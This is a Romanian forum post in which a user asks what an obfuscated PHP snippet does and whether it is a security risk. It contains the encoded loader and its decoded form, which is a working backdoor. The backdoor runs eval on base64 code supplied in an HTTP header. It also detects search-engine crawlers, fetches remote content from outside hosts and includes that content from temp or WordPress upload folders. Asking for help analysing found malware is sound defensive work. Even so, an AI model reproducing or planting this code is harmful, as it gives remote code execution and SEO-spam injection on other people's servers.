As ruga programtorii care sunt aici poate ma ajuta sa interpretez acest code.
Ce face, la ce foloseste, daca este o problema de securitate, etc.
Codul codat:
Codul decodat aici:
Daca aveti probleme sa-l cititi aici accesati link de mai jos.
http://www.unphp.net/decode/a4d90160a54739fd27265c783cfbcc2b/
Multumesc
Ce face, la ce foloseste, daca este o problema de securitate, etc.
Codul codat:
Cod:
<?php /*versio:3.01*/$Il1I=114406;if (!function_exists('I1ll1Il1')){$GLOBALS['Il1I'] = 'VqaW5pX3NldA$kYWxsb3dfdXJsX2ZvcGVu bPbEZGlzcGxheV9lcnJvcnMO(WZnRwL2Z0cDIwMTMxMTE0qMy4wMQ}#ASUlJMTExMQaHR0cDovLwCbSFRUUFMWfb2Zm.A?tYaHR0cHM6Ly8!SFRUUF9IT1NUVJodW5pb24MWLQc2VsZWN0TUkVRVUVTVF9VUkkx@U0NSSVBUX05BTUUoUVVFUllfU1RSSU5H=HkPw(tZGV0ZXJtaW5hdG9yjLgLmxvZwceSFRUUF9ZX0FVVEgGbsYmFzZTY0X2RlY29kZQZka}dmVyc2lviLQwxyLXBocA;SFRUUF9FWEVDUEhQDrIb3V0b2sISFRUUF9VU0VSX0FHRU5UO_LAZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAYQc2V6cW8ubmV0}bZmFzdGFkZHouY29tA}L3czLnBocD91PQdtaJms9aJnQ9cGhwJnA9E$JnY9NZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYzMXZtMHdNL3lwWFZGVWdVUUo1YVpMbTRWR3FMbnVLMUlVbVRTZE5XNFV5Y2l4b0JDSWdhNmVxMy8yeGZYZEExbVJxK2tjUCs4NzIrZVZuWHh3eC9XVEZvempsSzExYjhaTG5temhkbGxtdUdjWUxpNEVkN2RLd2pMTTA0TTl4VVJhNjV5U0o0eVdPM2phWll4dTRiUnluY1ZEd3N1WTVYWk8xYlFOMkdLTUQ3TTRRT0VOZzI4QitaVW9GZStxa3ZBd2lua1g2Nld6bTIvN01aR2VubmdPL2hMbHMrbkI3YTdBWFZsTTJjWmhuWmJ6aGVwbnZPQWpMZWJuTFU5WVVjVWpGRDE1R2NjTGxGdDlrcHpOL0JqKzRES3pzbVcyRGNDM2M1WWsyUW5VZVdBMFV5Yk8wQUs1VUFnc2RSTmNEZ2JxMlRKTHNLWUJEUVpSdGVhb1p6QVVwam9ZMlM4UEdxQlozQjJHV2xqd0ZoMnJyc3R4ZXRsb2FzNWkwaDFaa2tNVzBzeWMzK2hGcWRBMmVGUHhRVUtTSkdJeFRENXpzZUdEdFdGSjFZMFJVei9QMjdnQWh5Ylo0QzlDS2F2ZVkvSm1Id0JyTGc3b1VhN0xyaC9tdGY3Y0k0Si9KM21GN3VFUFRqOHU1bVZ4OW1NeE5GaTNoYm4vZE9aOHNIdWJUeGZ4cWV2OFJUOGlRSHo5dzdVK25rK3ZGd3ZzMDhSOFdKcnNnUjhDdUpDSDNpR3VyY3lnS0l4NkVTVmJ3QmhVZHpqZmI4cmN1RDRPYmF6R2FObnBWMFpWVUZTbE1WWkdEcUM0cXN2QW41a1dkZFFNYk04K0dOUzF3Qll1ZTFLbnlsekllYnVnNFFoM2Jyd2d3TzlydU1BbFV5V2ovVFJic1JVYmhWYk13RE1WUGRyTlkzTFVjeXdiQ3QveGJDdjl1c3FLOFpMQjRrU2E5RWtPNHlSTlpkSGR6Ri9qM2x0YlNMRngrbnN6dlBYOTZRT2xEd2ZQenF4K1EwNWZzUlo0bmVVcm0weHBMN3VSUWtjc2JHZXpzak9sL0ZEVTdyOW4vc0xaUmU4TkNyMEl0TmF4dzJnTXFsSEVrbzFoaEFHVUozWWcvYjVOc3hYV3RNczVVSW1IZkxrV29rcnUvMm84MXFNU2JnK2R3SCtsOGZZc3oyYTRFTDRFVk52NVJqQ0hXQ0RNOFhHZE0reEpvbG1SYTJpV3VpUzhEdEFkYzIvVVdLamIveFhNU0o2UW9WRGtON2lkekNNMVh5WHJFbytnMU1NNnRZUGZDSVZRZVVZSDZ2bDl6Qm0xWkhYVGNyaGxEaDFCK3BLcTc1amkyWW1HdXhnVjVUWmxSNzNJNkp1c2JqNnFiakk5dllTY3VxNGx0c0toTGVQWkdjUWNWTzlMbGttMjVSWm1YR2VBditPZVFrbTRIazhQQWNFWlp6cGZoR2dvc3dFSlpGa3lHd1AyM2pnOGFDeUszbVVndUlKcTFzTjRBTFVZWVFBbGY1ZkhIaG8wWEY5VGNhc1ErS3VzQ2V1SGdmYkpld1NyOTVLaXIrMkNWMDBOZkkySWM1eFAydldVUGU0S05BVDBhejdhRHpyOTRoeEtyRWMxMkIzSy9iVUJyT0tDNEVqbmFyeUJza2lYZ2JyQ0tjeDdDU1BKYnAzU3dLWFdCbUM0QklvTGdvM2M3Q1FMRCt1RE5BZXo5K1JmUWNIYzF2NElsWlRvMUpaZGQ1Zm55dDg2MDFvci9haFhyRFJTdjFpbzMyNVlWUVNjKzM2WHhjMDN5cmllS1VsdXNMVDdkYVkvN2xFbEZta3cvTjNlb1Q3QnFqeUlQa0I2VVhnMFBPd0NYNVNvb3hZVTF3MVJYdFRTeHRmcDgycDdMNGFFbERoVkh1Q0ZrT1FmZVhzNUxoMURXNDgrWHlYNGlXNXdraXNyRHBlVWU5S3dZZllyZ0tZL0w1WGN4UzlVbnlSZ2FLSWc0WXQ5Qi8wK0ZrcXBkaW0walNtd3FrYVR1amdqMkFDOHZUSXluamJtejA2VjhVZE9qcWpDQ095ZHhGU0ljeXZHcVJPaDJvSDNtamplcm50SnB5V1luOGRHU2NJandCM2dPSTl1S3U0ZlMwcXFONnlIR0dwYVVQdnFMOVpWSUFjallyTkZoaXRxVTJSSG9mQVJBMjRqcmVDdlhsV3JGR0FzNE02dGhwTjNIb1J1N28yZzlzc1BzOWFsNlFFZHdIeGltNmhTMU1SM0hGaGNVemFYSjZLR1ZhbmJCd1RQQllKQVpoOHp1SU1RTEtJRW5CUCsxVE5TcGQ5cllkYkJGbUt4QkFSTTZoc2lLNTdqVVJZSmdEdG8yT3ZjanpwZ2pFWHJ5OXZqdlhhUFRIVkxIM09zYWFueW9kL1VwNWsxRCtoQ3hIclF2S2pNY0NtRjQrYk9ub0FsbXhUMXhYYkpPakRjZ2hTYjRTTXlMUjNPaW9iUGI3cU1WY3RKeDZMMHkzbUZGNGNtRFBiR3FCcHptc0k1cDZrWGRNRnpqL0dYQUlGTENWQ0pzVkI4a0hUNW9xS3NHTFhGUVRBcm9ibmNCdzl0ZTNTdkVFQyt2S3ZzeCttVzJDOWQ2c3lJQUdNTmt0K0pCbG9aOGo5T29lQlZZZUdhaE5vRTgrS3Z3dnVHZUlRMEFUWS9SVEZDbDdCc2pEUEhTUkV4cE9GS1M1QlFsMHFnV1NhWFlsZVVCTHFzNTZPeHVCUXdOeGtCTUptOHJxanZzeXlPK2dFbnlNVDNpL256RjBxVmhXSzBmc3FORFRoWG9LNThteDVGSnpsYi9BenJqaTJZPSIpKSk7cHJlZ19yZXBsYWNlQb';function I1ll1Il1($a, $b){$c=$GLOBALS['Il1I']; $d=pack('H*','6261736536345f646'.'5636f6465'); return $d(substr($c, $a, $b));};$QO000Q000 = I1ll1Il1(3374, 16);$QO000Q000("/QQ0QQOOOQ/e", I1ll1Il1(502, 2872), "QQ0QQOOOQ");};?><?php
Codul decodat aici:
Cod:
<?php if (!defined("determinator")) {
if (function_exists(I1ll1Il1(2, 10))) {
@ini_set(I1ll1Il1(14, 20), 1);
@ini_set(I1ll1Il1(39, 19), 0);
}
function w3net_feof($QQO0OQ, &$I1111l = NULL) {
$I1111l = microtime(true);
return feof($QQO0OQ);
}
function w3net_getfile($QQO0OO, $QOQQQQ) {
$QO0Q00 = "curl";
$I1IIl1 = $QO0Q00 . "_init";
if (@ini_get("allow_url_fopen") == "1") {
return @file_get_contents("http://" . $QQO0OO . $QOQQQQ . "&w=fgc");
} elseif (function_exists($I1IIl1)) {
$Ill11I = @$I1IIl1();
$IllIII = $QO0Q00 . "_setopt";
$QQQO0O = $QO0Q00 . "_exec";
@$IllIII($Ill11I, CURLOPT_URL, "http://" . $QQO0OO . $QOQQQQ . "&w=cu");
@$IllIII($Ill11I, CURLOPT_HEADER, false);
@$IllIII($Ill11I, CURLOPT_RETURNTRANSFER, true);
@$IllIII($Ill11I, CURLOPT_CONNECTTIMEOUT, 6);
$IIllll = @$QQQO0O($Ill11I);
@curl_close($Ill11I);
if (empty($IIllll)) {
$IIllll = "";
}
return $IIllll;
} else {
$QQO0OQ = @fsockopen($QQO0OO, 80, $Q00OO0, $QQ00O0, 5);
if ($QQO0OQ) {
$IlII11 = "";
$I1111l = NULL;
@fputs($QQO0OQ, "GET {$QOQQQQ}" . "&w=sk HTTP/1.0" . "
" . "Host: " . "{$QQO0OO}
");
$III11I = PHP_OS . "/" . PHP_VERSION;
@fputs($QQO0OQ, "User-Agent: {$III11I}
");
while (!w3net_feof($QQO0OQ, $I1111l) && (microtime(true) - $I1111l) < 2) {
$IlII11.= @fgets($QQO0OQ, 128);
}
@fclose($QQO0OQ);
$IllI1I = explode("
", $IlII11);
unset($IllI1I[0]);
return implode("
", $IllI1I);
}
}
}
function w3net_output($Q0Q0Q0, $QQOO0Q) {
echo "Y_" . $Q0Q0Q0 . ":" . $QQOO0Q . "
";
}
function php_server($Q0QO0Q) {
return @$_SERVER[$Q0QO0Q];
}
$I11lI1 = I1ll1Il1(61, 20);
$QOQOOO = I1ll1Il1(82, 6);
$Q0QO00 = I1ll1Il1(91, 10);
$QQO0OO = I1ll1Il1(101, 10);
if (isset($_SERVER[I1ll1Il1(113, 7) ])) {
if (@$_SERVER[I1ll1Il1(113, 7) ] != I1ll1Il1(122, 4)) {
$QQO0OO = I1ll1Il1(131, 11);
}
}
$QQO0OO.= strtolower(@$_SERVER[I1ll1Il1(143, 12) ]);
foreach ($_GET as $Q0Q0Q0 => $QQOO0Q) {
if (strpos($QQOO0Q, I1ll1Il1(158, 7))) {
$_GET[$Q0Q0Q0] = I1ll1Il1(166, 0);
} elseif (strpos($QQOO0Q, I1ll1Il1(169, 8))) {
$_GET[$Q0Q0Q0] = I1ll1Il1(166, 0);
}
}
if (!isset($_SERVER[I1ll1Il1(178, 15) ])) {
$_SERVER[I1ll1Il1(178, 15) ] = @$_SERVER[I1ll1Il1(195, 15) ];
if (isset($_SERVER[I1ll1Il1(211, 16) ])) {
$_SERVER[I1ll1Il1(178, 15) ].= I1ll1Il1(230, 2) . @$_SERVER[I1ll1Il1(211, 16) ];
}
}
function get_temp_directory() {
$Q0QOOO = dirname(__FILE__) . DIRECTORY_SEPARATOR;
$QOO0OO = Array("/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $Q0QOOO . "tmp", $Q0QOOO . "wp-content/uploads", $Q0QOOO . "wp-content/cache",);
foreach ($QOO0OO as $QQQQQO) {
if (!empty($QQQQQO)) {
$QQQQQO.= DIRECTORY_SEPARATOR;
if (@is_writable($QQQQQO)) {
$Q0QOOO = $QQQQQO;
break;
}
}
}
return $Q0QOOO;
}
if (strlen($QQO0OO) < 10) {
define(I1ll1Il1(234, 16), 0);
} elseif ($I11l1l = $QQO0OO . @$_SERVER[I1ll1Il1(178, 15) ]) {
$QQ0QOQ = @md5($QQO0OO . PHP_OS . $QOQOOO . $Q0QO00);
$w3n_code = get_temp_directory() . I1ll1Il1(251, 2) . $QQ0QOQ;
define(I1ll1Il1(234, 16), $w3n_code);
$QOOQQQ = $w3n_code . I1ll1Il1(253, 6);
if (@$_SERVER[I1ll1Il1(261, 15) ] == $QQ0QOQ) {
$QOO0QQ = I1ll1Il1(279, 18);
echo "
";
w3net_output(I1ll1Il1(301, 8), $QOQOOO . I1ll1Il1(310, 2) . $I11lI1 . I1ll1Il1(315, 6));
if ($IIl1ll = $QOO0QQ(@$_SERVER[I1ll1Il1(322, 16) ])) {
eval($IIl1ll);
echo "
";
w3net_output(I1ll1Il1(341, 4), I1ll1Il1(345, 3));
}
exit(0);
}
$QQQ00Q = False;
$QQ0QQQ = @strtolower(@$_SERVER[I1ll1Il1(349, 20) ]);
foreach (explode(I1ll1Il1(371, 2), I1ll1Il1(373, 54)) as $IIll1l) {
if (strpos($QQ0QQQ, $IIll1l) !== False) {
$Il1IlI = @fopen($w3n_code . I1ll1Il1(253, 6), I1ll1Il1(427, 2));
$Ill1l1 = @urlencode(@$_SERVER[I1ll1Il1(178, 15) ]);
@fwrite($Il1IlI, time() . " " . $IIll1l . " " . $Ill1l1 . "
");
@fclose($Il1IlI);
$QQQ00Q = True;
break;
}
}
if (@is_file($w3n_code)) {
@touch($w3n_code);
@include_once ($w3n_code);
} elseif ($QQQ00Q === True) {
$Q00000 = Array(I1ll1Il1(429, 12), I1ll1Il1(443, 16));
if (@touch($w3n_code)) {
$I11l1l = @urlencode($I11l1l);
$QOQQQQ = I1ll1Il1(461, 14) . $I11l1l . I1ll1Il1(478, 4) . $QQ0QOQ . I1ll1Il1(483, 12) . $I11lI1 . I1ll1Il1(497, 4) . $QOQOOO;
$Il1III = w3net_getfile($Q00000[0], $QOQQQQ);
@touch($w3n_code);
}
}
} else {
define(I1ll1Il1(234, 16), 1);
}
}
Daca aveti probleme sa-l cititi aici accesati link de mai jos.
http://www.unphp.net/decode/a4d90160a54739fd27265c783cfbcc2b/
Multumesc